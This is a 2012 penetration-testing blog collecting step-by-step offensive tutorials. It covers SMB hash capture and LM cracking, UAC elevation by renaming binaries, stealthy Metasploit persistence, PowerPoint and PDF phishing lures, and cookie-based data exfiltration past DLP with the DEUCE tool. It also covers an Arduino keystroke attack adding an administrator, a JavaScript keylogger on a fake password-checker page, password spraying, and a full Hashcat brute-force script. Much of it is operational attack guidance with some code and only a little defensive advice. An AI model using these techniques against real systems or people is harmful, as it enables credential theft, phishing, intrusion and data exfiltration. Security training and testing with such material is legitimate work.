Wednesday, December 19, 2012

Refresher Series - Capturing and cracking SMB hashes with Cain and Half-LM rainbow tables.

First things first, what is an LM Hash or Lan Manager Hash? A LM Hash is an outdated hashing function, however still widely in use in corporate environments today. The most important features of a LM hash is as follows:

·         Passwords are a Maximum of 14 characters or 14 bytes.
·         Passwords are converted to uppercase
·         Passwords are padded to 14 bytes
·         The 14 byte password is split into two 7 byte halves. (This is the weakness exploited by the Half LM attack)
·         Read more about LM hashes at

Simply put, if a user chooses a password of ‘Password’ the LM hashing function changes it into “PASSWOR” and “D”, or if they choose “PaSSwOrD12345!” it is changed to
“PASSWOR” and “D12345!”.  Obviously cracking two short passwords will take less time than 1 long password.

Before you can use the Half-LM rainbow tables you either need to download them or generate them yourself like I did using Winrtgen which is included with Cain.  When using Winrtgen it is important to note the disk space and Success probability. This is directly influenced by the Charset and the Number of tables.  In the image below you see that the tables will only recover 97% of passwords using the alpha-numeric-symbol14 charset. You will also want to run the Benchmark to see how long it will take you to generate the tables. On a side note you can divide the tables.lst file to distribute load, even among cores as Winrtgen is not written for multicore support. Then we wait…..

On to the fun stuff, to capture a hash we want to use the Metasploit capture SMB auxiliary module, which is located in auxiliary/server/capture/smb. Leave the default settings with the exception of the CAINPWFILE. Set this to output the file where ever you like.

Now you wait, you can do various things to coerce the victims to come to you such as NetBIOS spoofing or embedding UNC paths, but that’s a topic for another day. When a user attempts to connect to the capture server you will see output similar to this. The important thing to note is that the capture contains an LM Hash.

When you’re ready you can load the hashes into Cain, by selecting the Cracker tab then the plus symbol to add your hashes from a list.

The select the hashes you want to crack and right click, selecting Cryptanalysis attack, Half-LM hashes + challenge, via Rainbow tables. 

Load your tables and let it run. The amount of running time depends on the amount of hashes.

When it is done you have a result similar to the image below. As you can see we have not recovered the actual password yet, but we’re close. Let’s finish them off.

Follow the similar procedure as above by right clicking the hashes, but this time you’re going to select brute-force attack and LM Hashes + Challenge. As you can see I set the Max length to 3, that’s because I assume that nobody picked a password over 10 characters, which is probably a pretty good assumption in this case. ;)
Remember we already cracked 7 of the characters.  As you can see the 2nd half of the passwords are cracked extremely fast.

Cain then does a quick case brute force against the cracked password to determine its proper case, as you can see the passwords were recovered.

That’s it! It is actually simpler in practice then it appears here. Good luck and have fun.

Tuesday, October 30, 2012

Getting System the Lazy Way

We know all too well that many users are local administrators. We also know we can send or drop binaries to these users and they will run whatever we want them to. The attack vector can be anything really phishing, social engineering, flash drives, CD-ROMs or anything else you can imagine.  The problem lies in when they run the binary if they don’t run it as admin we may not be able to get system level access. To be honest that is the level I want and prefer to have. Take the following scenario:

We deliver our malicious binary and we disguise it as an upgrade the file is named ‘upgrade.exe’. The victim runs the upgrade and we get our shell. But it’s just a user shell. While I will take a user shell over no shell, I want system level access. 

You may be able to get system a bunch of different ways in addition to the ‘getsytem’ command. Such as the bypass UAC (user account control) and some other nice post modules.

We can easily force a user to run a file as admin by simply altering the filename. If we change ‘upgrade.exe’ to ‘update.exe’ windows automatically makes you run it as administrator. Which is you can tell by the UAC logo now on top of the executable.

If the user decided to run it now we will be able to get system level access without much more effort as seen below.

What’s interesting is the filename can be many different things and it only has to contain the words the format doesn't matter. Meaning it could be local_update.exe or test-update. There are also other keywords such as:
  • install
  • instal
  • installer
  • setup
  • patch
  • update

I am sure there are others but I will leave it up to you to find them. The other interesting thing is these keywords don’t have to exist in the file name they can be in the details page of the file.

The only downside is if the user is not an administrator this will prompt for administrator credentials, and that may result in you not getting any shell. But as I said in the beginning many users already run as local admin.

Sunday, September 23, 2012

Metasploit Persistence

During penetration tests and red team versus blue team engagements sometimes you need your shells to always be available. Let’s say you pop a box, get your meterpreter shell which always happens right at the end of the day. You leave your shell, only to come back in the morning and find out the connection dropped because the system rebooted. Now you have to exploit all over again or worst case scenario if you used a password to compromise a system and the person changed it and now you’re stuck without a shell. That would be very sad, luckily @Carlos_Perez/Darkoperator made a persistence script that is included in Metasploit. It’s awesome too, get your shell and run persistence.

Now, if there is an unexpected reboot you will get your shell back, to clean up the shell all you need to do is run the clean up by running the multi_console_command script and point it at the cleanup file which is given to you when you run the persistence command.

One thing I found lacking though was the use of random file names. While normally that is not an issue, I found that sometimes I needed to give the files a name. Either so I could tell a point of contact ‘here is the registry key or service I created WRPIQDAHVMHJ’ also at times I felt that this string of random characters would look odd if you were trying not to get caught.

I took it upon myself to alter the built in script to suit my needs. I added functionality to the persistence script to take a new parameter ‘-N’ which allows you to specify a name for the service or registry key. If you don’t specify the switch it will just default to random.  Now you can name it whatever you want. Give it a name like Microsoft-Active-Switch or something relevant to the company and it will be harder to detect and easier to relay as information to a point of contact.  I needed the option and I hope it can be useful to you as well.

While I have written in python, I have never tried to alter a ruby script before. This was my first attempt here it is.

Wednesday, August 15, 2012

Attack with Power... Point that is.

There have been all kinds of document attacks, but what about PowerPoint. It turns out that PowerPoint makes it easy for an attacker to turn the innocent slideshows into a nasty little attack.  The attack involves 4 simple steps, make a slideshow, make an action, rename the file and distribute it.

First things first, you need to make a slideshow. Design it anyway you want, pick the slide or slides you want to use the action on. Make a new text box and drag the box to cover the whole page. Click on insert -> actions -> mouse over. Then click the hyperlink button and select URL. Enter the desired URL, click OK and save the PowerPoint. In figure 1 I have entered a URL that is already set up for the Java Applet attack. This can be done with Metasploit or the SocialEngineering Toolkit.

Figure 1

If we were to send this to a target as is, it would work only when they started the slide show, in an attempt to circumvent that we can rename the file from a PPT to a PPS (figures 2,3), which is a PowerPoint Slideshow. When the file is opened it starts as a full screen slide show. Since our attack is launched via a mouse over, when the user attempts to close the document the odds are they will trigger the attack.

Figure 2
Figure 3

At this point our malicious web page is opened, and the Java Applet attack commences, as seen below.

The user may not even be aware that they triggered the webpage to open; it might be beneficial to have the page appear to be a common webpage such as Gmail or Facebook. If the target decides to hit run we would be given our shell and complete control of the system as shown in figure 5.

Figure 5

I wanted to see if it was possible to embed a UNC path, turns out it is just as simple. Following the same steps as outlined above but when you select URL enter a UNC path such as \\ipaddress\a.gif and set Metasploit to use the auxiliary/server/capture/smb module for capturing your requests. As you can see from figure 6 each time the mouse passes over the target area it sends the credentials. Now all you have to do is crack them. 

Figure 6

These attacks are not new, the important part is that PowerPoint does not warn the user. There is no popup asking the user if they want to visit the site and more importantly there is absolutely no warning of the attempted authentication attempt. The user may not even know that they have fallen victim to this attack.

This attack is very difficult to detect, as this is simply using the features of PowerPoint for a malicious purpose. If this type of attack originated from a trusted individual spoofed or even a disgruntled employee it could be absolutely devastating. My advice is simple; make sure you know the sender. There is nothing wrong with making a phone call and saying “Did you send me this PowerPoint.” Also, if you notice any odd behavior after using a PowerPoint it may warrant further investigation. 

Special thanks to my wife and @_Jagar_

Wednesday, July 18, 2012

DEUCE: Bypassing DLP with Cookies

In a recent B-sides event, there was a talk about the exfiltration of data and Data Loss Prevention (DLP) systems. A known vector to bypass DLP, is the use of NSLookup. The attacker requests a domain he controls but adds a hostname that contains the data that needs to be sent outside the controlled environment. This means if an attacker wanted to steal a name and social security number he would request “” This request would hit the DNS server and be logged thus creating a list of identities for the attacker to mine at a later time.  The maximum limit is 255 characters for this kind of attack. This concept got me thinking what about a standard GET request such as this would make life easier for the attacker. He would no longer need to control the DNS server; he would just need to see what pages were requested. We would still be limited by the character maximum and each request could be easily logged and analyzed by proxies or alerting systems.  But, let’s be honest most DLP systems are going to alert on these types of requests, or at least they should.

After some dialog with some friends, it was pointed out that using cookies would be a great alternative. Cookies aren’t normally logged by proxies or other systems. Also if the cookie was encoded or encrypted, as they normally are it would keep the DLP and prying eyes at bay.  As an added benefit we are no longer limited by the 255 character maximum and one request could send many cookies.  

This led to the need to create a tool to test this concept. Enter Data Exfiltration Using Cookie Encryption or DEUCE. DEUCE went from simple concept to a multi-encoding and encryption DLP bypass tool. The program simply takes an input file and creates a cookie for each line.  DEUCE has the ability to encrypt via AES, hash with MD5 or use a custom multi-encode with a 3 times replacement cipher.  The program then sends its data to the server, where the AES and multi-encoded options are automatically converted back to plain text. The MD5 is a one way hash that would need to be cracked. However, if an attacker sent a list of social security numbers it would only take minutes to crack the 9 digits number using a tool like Hashcat. In the Python code you can change the name of the cookie, just make sure you change it in the client and the server.

DEUCE is written in python but could easily be converted to an executable using py2exe or PyInstaller also the AES encryption relies on PyCrypto. Because this is just a proof of concept tool DEUCE does not currently support SSL, but it may in the future.

Using DEUCE is simple. By default the server listens on all interfaces and on port 80. The DEUCE client has more options such as encryption and encoding methods, target URL and input file. Example usage below: 

  • python -o ouput.txt
    • This starts the listening server on all interfaces on port 80 with the output being output.txt
  • python -u http://location_of_deuce_server  -i inputfile.txt -m
    • This starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server using the -m tells DEUCE to use multi-encode mode.

Please feel free to test this concept in your environment; obviously I do not have access to every possible solution out there. It is important to note I am in no way responsible for how you use DEUCE. This tool is designed to help penetration testers and assist users in testing their DLP implementation. You are not permitted to use DEUCE for any illegal means.

Thanks to Brandon Knight (@kaospunk) for the cookie idea and Jake Garlie (@_Jagar_) for listening to me rant about this.



Saturday, July 7, 2012

How to add a local administrator with the Arduino Leonardo.

For a while now security researchers have been using the Teensy for HID attacks. Which really is the way to go if that’s all you want to do. However, if you are like me you want to do other things as well you need something bigger. Enter the Arduino Leonardo, this Arduino board supports emulating a HID (Human Interface Device) out of the box. It’s not tiny like the Teensy but it is only 2.7” x 2.1” in size which is still small. It would be very easy to just leave the Leonardo in a backpack and just run the USB cable to the victim device, especially since the whole attack takes about 5 seconds.

When programming the Leonardo to emulate a HID I really recommend using a button in conjunction with the device, see image below.  This way if you make a mistake you can upload a new sketch.  It would be very difficult to reprogram it if it kept typing add user over and over again.


Here is the attack in action via screen recording.

In the first part of the video I show what users are on the system. Then the device is plugged in and the attack launches.  The Leonardo starts to emulate a keyboard by activating the windows key and then types in cmd.exe. Next it uses the keyboard shortcut for run as admin (ctrl+shift). Then the Leonardo hits tab 3 times to select OK on the UAC protection and hits enter. Finally, an administrator command prompt is open and the Leonardo types out the commands to add user and adds the user to the local administrators group and closes the prompt. The nice part about this is since you write the program there are no typing errors and it types about a hundred times faster than you do. 

The following code is for use with a button. However, feel free to remove that part if you wish

Thanks to  @irongeek_adc for pointing out the Leonardo and answering my questions and to @matthewneely, @SoapyWetDish and @dave_rel1k for other guidance.

Friday, June 29, 2012

How Fast Can Your Password Be Cracked?

Instantly with a JavaScript keylogger.

Okay, so we aren't actually going to crack your password. In this brief tutorial, we show you how we can use the Metasploit JavaScript Keylogger auxiliary module in a penetration testing phishing campaign or user awareness training. First, we need a couple of items before we get some passwords.

  • A webserver (example below)
  • A webpage with a password form
  • JavaScript hook.
  • Metasploit

You could launch this attack via cross site scripting however, here we will use a page based on to lure a person to checking how strong their password is.

In the screenshot above we can see a couple of social engineering tricks at work. Key items to note are “help users”, “never sent” and the list of helpful tips. These items reinforce trust in the victim. Next the user will most likely test the password field to see how the website responds, and we have a fully functional password checking system. 

The site responds with approximately how long it would take to crack this password on a standard desktop PC without GPU cracking. But we don’t need to wait 5 million years or even 5 seconds. As you can see below each keystroke was captured by the keylogger. 

How did we do it?
Simple we used a seven line python webserver:
1:  import SimpleHTTPServer  
2:  import SocketServer  
4:  handler = SimpleHTTPServer.SimpleHTTPRequestHandler  
5:  httpd = SocketServer.TCPServer(('', 80), handler)  
6:  print "Server Started."  
7:  httpd.serve_forever()  

Now our victim can connect to our “helpful” website. Then we need a webpage to put our JavaScript keylogger into(find or make your own). Next we put the javascript in the source code of our html like so:<script type=”text/javascript” src=http://your_ip_or_hostname/anything.js”></script> .  
 Finally, we start the Metasploit auxiliary module.  The options in the module depend on your environment setup. 

That’s it! It’s your job to get the victim to the site.
This is intended for informational and/or educational purposes only; I am not responsible for your actions.

Friday, June 15, 2012

PATH v0.2 update

I got to use PATH during my analysis of the Linked-In and E-harmony hash leaks. I cracked over 2 million hashes on a light weight laptop. Using it in a real world scenario proved to me just how useful this script can be. While I might not have had the raw horse power of some the systems out there. I made up for it with efficiency. I sent the hashes into PATH with a top 200 flag set (-t 200). This meant once the initial output was complete PATH fed Hashcat 200 Hashcat masks based on frequency. This allowed me to just let it run, there was no downtime to check to see if the script had completed, where if it was running overnight would just start the next mask. Enjoy.

Change log:

  • Broke analyzing and cracking section into two separate functions.
  • Increased error handling.
  • Giving PATH just an input file now results in only an analysis being done on the file.
  • General code clean up.

Tuesday, June 5, 2012

PATH - Password Analysis To HashCat

What is PATH: It is a script that integrates password analysis and Hashcat.

First and foremost let me say, I do not code on a regular basis. I created this script out of necessity and part laziness on my part(I always forgot which masks I already did). DigiNinja’s Password analysis tool Pipal is what got me thinking about creating this.Thanks to @digininja. I found myself analyzing list with Pipal and taking the Hashcat masks from the output one by one back into Hashcat. From time to time my box would sit idle because I didn’t know the exact moment the bruteforce had completed and sometimes it sat idle for hours. I grew tired of waiting and restarting Hashcat so I automated it and PATH was born. PATH is written in Python and is simple to use with a few command line options.
PATH can take a list of passwords then generate Hashcat masks and display them. However, the fun part comes in when you apply the cracking option. This takes your list, analyzes it, generates the masks and starts the brute-force attack, with each mask sequentially.

You can also start with just a list of hashes and a large dictionary and the cracking option. PATH can take this list start a dictionary attack, analyze the output, generate the masks and start the brute-force attack. You can even specify rules, if you do it will run the plain dictionary first then run it again with the rule applied.

Here is the help file:
Password Analysis To Hashcat (PATH): Generate Hashcat Masks From A Wordlist
Start a BruteForce Attack With The Results
optional arguments:
-h, –help show this help message and exit
-i INPUT, –input: Input File Name for Mask Analysis
-t TOP, –top:How Many Values Outputted Default 10
-o OUTPUT, –output: Output File Name
-c, –crackmode: Enables Brute ForceCrack Mode
-s SDICT, –sdict: Initial Dictionary
-p PHASH, –phash: Password Hash Type
-l HASHLIST, –hashlist: List of Hashes
-r RULES, –rules: Apply Rules to Inital Dictionary
-u, –usage How to Use This Tool
Example usage:
python -s bigdict.txt -l hashes.txt -p 0 -o output.txt -c
python -i plain.txt -c

This script requires a minimum of Python 2.7 and HashcatPlus. As long as the switches in Hashcat stay the same it should continue to work fine as versions progress. *This was tested only with MD5, LM and NTLM hashes. You must define the location of HashcatPlus in the script prior to running it.

****Thanks to the Linkedin hack I was able to confirm PATH works with SHA1.****
If you have trouble copy and pasting the code below. Here is just the text.
1:  #!/usr/bin/env python  
2:  #PATH created by F8lerror  
3:  #Follow me on Twitter @f8lerror  
5:  import subprocess  
6:  import string  
7:  import re  
8:  from collections import Counter  
9:  import argparse  
12:  hcpath = ''  
14:  if hcpath is '':  
15:       print "\nHEY! You need to put the path to hashcat in the script. In the hcpath parameter"  
19:  parser = argparse.ArgumentParser(description='Password Analysis To Hashcat (PATH):\nGenerate Hashcat Masks From A Wordlist Start a BruteForce Attack With The Results')  
20:  parser.add_argument('-i','--input', help='Input File Name for Mask Analysis', required=False)  
21:  parser.add_argument('-t','--top', help='How Many Values Outputed Default 10', required=False)  
22:  parser.add_argument('-o','--output', help='Output File Name', required=False)  
23:  parser.add_argument('-c','--crackmode', action='store_true', help='Enables Brute ForceCrack Mode', required=False)  
24:  parser.add_argument('-s','--sdict', help='Initial Dictionary', required=False)  
25:  parser.add_argument('-p','--phash', help='Password Hash Type', required=False)  
26:  parser.add_argument('-l','--hashlist', help='List of Hashes', required=False)  
27:  parser.add_argument('-r','--rules', help='Apply Rules to Inital Dictionary', required=False)  
28:  parser.add_argument('-u','--usage', action='store_true', help='How to Use This Tool', required=False)  
31:  args = parser.parse_args()  
33:  if args.usage is True:  
34:       print '-'*80+'\n'  
35:       print 'This was designed to help automate the process of cracking passwords. \nBy analyzing the output of cracked password PATH initiates brute force with the results\n\n'  
36:       print 'Example: Already have some passwords cracked: \n\t\"./toolname -i listofcrackedpasswords -l listofhashes -o outputfile -p hashtype -c\" \n\tThis will analyze the list and start a brute force against the top 10 most common hash masks'  
37:       print '\nExample: Fresh list of hashes: \n\t\"./toolname -l listofhashes -o outputfile -p hashtype -s bigdictonary -c\" \n\t This attack will do a dictonary attack first, then using what was cracked\n\t by the dictonary analyze the output and perform a brute force against the top 10 most common hash masks'  
38:       print '\n\nTo use rules add the -r flag to the dictonary attack\n'  
39:       print 'This has only been tested with the following hash types:\n\t0 = MD5\n\t1000 = NTLM\n\t3000 = LM\n'  
42:  def cracker():  
43:       flist = []  
44:       for line in ifile:  
45:                 line2 = re.sub(dhash, '', line)  
46:                 res = []  
47:                 for letter in line2.rstrip():  
49:                      if, letter):  
50:                           res.append('?u')  
51:                      if, letter):  
52:                           res.append('?l')  
53:                      if, letter):  
54:                           res.append('?d')  
55:                      if, letter):  
56:                           res.append('?s')  
57:                 nlist = ''.join(res)   
58:                 flist.append(nlist)  
61:       flist1 = '\n'.join(flist)  
62:       cnt = Counter()  
63:       for zlist in flist:  
64:            cnt[zlist] += 1  
67:       backtolist = cnt.items()  
69:       sortme = sorted(backtolist, key=lambda tup: tup[1], reverse=True)  
70:       if sortme:       
71:            print '\n'  
72:            print '-'*80  
73:            print 'Top '+str(num)+' Hashcat Masks with Frequency Count'   
74:            print '-'*80  
75:            print '\n'  
76:            for key, value in sortme[0:num]:  
77:                 print key +' ('+ str(value) +')'  
78:            usedmask = []  
82:            if args.crackmode is True:  
83:                 if args.phash is None:  
84:                      print '\nOops! I need a hashtype. Hint: -p'  
85:                 elif args.output is None:  
86:                      print '\nOops! I need an output file. Hint: -o'  
87:                 elif args.hashlist is None:  
88:                      print '\nOops! I need something to crack. Hint: -l'  
89:                 else:  
90:                      for mask in sortme[0:num]:  
91:                           print '\n'  
92:                           print '-'*80  
93:                           print 'Now Brute Forcing With '+mask[0]  
94:                           print '-'*80  
95:                           print '\n'  
96:                 [hcpath, '--remove', '--hash-type', args.phash, '--attack-mode', '3', '--outfile', args.output, args.hashlist ,mask[0]])                 
100:  if is None:  
101:       num = 10  
102:  else:  
103:       num = int(  
105:  splist = r"[\W_]"  
106:  ualpha = r"[A-Z]"  
107:  lalpha = r"[a-z]"  
108:  ldigit = r"[0-9]"  
109:  dhash = r"^[a-f0-9]*:"  
113:  if args.sdict:  
114:       if args.rules:  
115:            print '\n'+'-'*80  
116:            print 'Starting Dictionary Attack'  
117:            print '-'*80+'\n'  
118:            if args.phash is None:  
119:                 print 'Oops! I need a hashtype. Hint: -p'  
120:            elif args.output is None:  
121:                 print 'Oops! We need an output file. Hint: -o'  
122:            elif args.hashlist is None:  
123:                 print 'Oops! I need something to crack. Hint: -l'  
124:            else:  
125:       [hcpath, '--remove', '--hash-type', args.phash, '--outfile', args.output, args.hashlist ,args.sdict])  
126:                 print '\n'+'-'*80  
127:                 print 'Starting Dictionary with Rule Attack'  
128:                 print '-'*80+'\n'  
129:       [hcpath, '--remove', '--hash-type', args.phash, '-r', args.rules, '--outfile', args.output, args.hashlist ,args.sdict])  
130:                 try:  
131:                      ifile = open(args.output, 'r')  
132:                      cracker()  
133:                 except IOError, err:  
134:                      print '\n'+'-'*80+'\n'+'The file doesn\'t exsist.\n'+'-'*80+'\n'  
135:       else:  
136:            print '\n'+'-'*80  
137:            print 'Starting Dictionary Attack'  
138:            print '-'*80+'\n'  
139:            if args.phash is None:  
140:                 print 'Oops! I need a hashtype. Hint: -p'  
141:            elif args.output is None:  
142:                 print 'Oops! We need an output file. Hint: -o'  
143:            elif args.hashlist is None:  
144:                 print 'Oops! I need something to crack. Hint: -l'  
145:            else:  
146:       [hcpath, '--remove', '--hash-type', args.phash, '--outfile', args.output, args.hashlist ,args.sdict])  
147:                 try:  
148:                      ifile = open(args.output, 'r')  
149:                      cracker()  
150:                      ifile.close()  
151:                 except IOError, err:  
152:                      print '\n'+'-'*80+'\n'+'The file doesn\'t exsist.\n'+'-'*80+'\n'  
154:  if args.input:  
155:       try:  
156:            ifile = open(args.input, 'r')  
157:            cracker()  
158:       except IOError, err:  
159:            print '\n'+'-'*80+'\n'+'The file doesn\'t exsist.\n'+'-'*80+'\n'  

Guessable Passwords the Unpatchable Exploit

During penetration assessments the pen tester attempts to compromise systems in an effort to penetrate into client networks. The pen tester tries various methods from exploiting web application vulnerabilities, network layer vulnerabilities, common misconfiguration and users.  But this is about what is more effective guessing passwords or exploits.

Currently the Exploit Database has 15,873 exploits. Is this all the exploits in the world? No, these are just many of them in one place that’s all. Even if we add another 14,478 to make an even 30,000 public exploits is that truly a large surface area when compared to the millions of systems on the Internet today.  If we pretend there are only 1 million systems on the Internet that is only 3 percent of systems that can be exploited.

In contrast, as of December 31, 2011 there are 2,267,233,742 users on the Internet according to We can even subtract a billion users for good measure and that is still over a billion users remaining. We use passwords in everything from corporate/personal email, Facebook, banking, taxes and anything else you can imagine.  How many of these users have weak or guessable passwords like password, 123456, Password1 or the real hard one to guess P@ssw0rd ;) .

The big problem lies in these same users make passwords for their corporate systems too and they put your corporation at risk. In data collected 2% of users select a base word of password and 12% use a base word of a season such as summer, winter, spring and fall. This was from a total user count of 38,148 and across multiple corporate industries not just random website breaches. In essence 5,340 users could be compromised with an attacker guessing passwords like Password1, Summer11, Winter12, and Fall2011. While these passwords conform to the term complex as defined by Microsoft, they are still weak. Many users take short cuts, this is because they feel they are not a target, not important, their access doesn’t matter, or even out of spite to the organization. Penetration testers know this and so do the attackers. in the screenshot above says some of these passwords are strong but this is rated strong because the amount of time it would take a computer to crack your password.  A standard desktop computer would take 10 days to crack “Fall2011” according to, and we wont even talk about how fast GPU cracking could crack this password.

How do attackers use this information? This type of attack is normally executed by using a username brute force. A username brute force tries one password such as Password1 across multiple usernames. This technique avoids lockouts and if run slowly enough it can go unnoticed by system administrators. Especially if executed against a web mail server, everyone has access to email. However, against a small user base this wouldn’t be very effective but attacking over a hundred users can prove to be very lucrative.  Once the attacker can access email which is generally controlled by Active Directory and depending on the systems available the possibilities are endless… VPN, Citrix, maybe remote desktop.

In closing use spaces, use symbols, use phrases changing your password from “Fall2011” to “I love fall!!”  makes it harder to guess and now takes 1 billion years to crack on a desktop PC.  Eventually pass phrases will have easily guessed phrases too but the clock is ticking.

PDF Pwnage

During many penetration tests the need to social engineer a target may be required. You could send targets all kinds of payloads or malicious things but sometimes that gets picked up by anti-virus. Also, sometimes getting ‘shell’ may not be in the rules of engagement.
Let’s talk about something that completely relies on the user being conned into following the attackers instructions. The scenario is simple send the user a PDF form and have them submit the form. The attack can be broken down into three main steps.
  1. Create the form
  2. Spoof an email
  3. Wait for the results
There are many ways to make this form, this is just how I did it.
First create a form and make it believable.
Word form
Next import it into Acrobat and select create PDF form.

Acrobat will do some magic and on the right hand side click add new field -> OK button. A blue box will show up and place it anywhere you want. This is your submit button. Click properties and on the options tab set the label to submit. Finally under the actions tab select the trigger to be mouse down. Select the action of Submit a form and click add and fill out the appropriate information.  ***If you are doing this over an insecure network use HTTPS please**

Save the document and then get ready to send it. In this example I would spoof it from an human resources person. Also if you don’t know how to spoof an email you shouldn’t even be reading this.
Finally, we fire up our listener this could be just netcat or write your own listener. Thanks @kaospunk for the quick and dirty POC.
Why will this attack be successful?
  • The victim will be more relaxed due to the spoofed email.
  • If the email is worded carefully using words like ‘we’, ‘help’ and ‘required’ these types of words cause psychological effects on people making them more apt to follow instructions.
  • No Anti-Virus will be triggered, which relaxes the user more.
  • The words in the document “Please, use the submit button to ensure secure delivery of your information.” Enforce the “trustworthiness’ of the message.
  • When a link is clicked in Adobe reader it always asks if the user wants to allow the connection. This inherently trains users to click allow without reading
  • It’s easy. Let’s face it users are lazy.
Here is the result of a successful test attack.

How could the user have protected themself?
  • Anytime a document requests sensitive information verify the source or sender.
  • If the requested action seems out of the ordinary verify the source or sender.
  • When the submit button is hit a warning pops up like the image below, verify the address the document is going to.

Good Luck!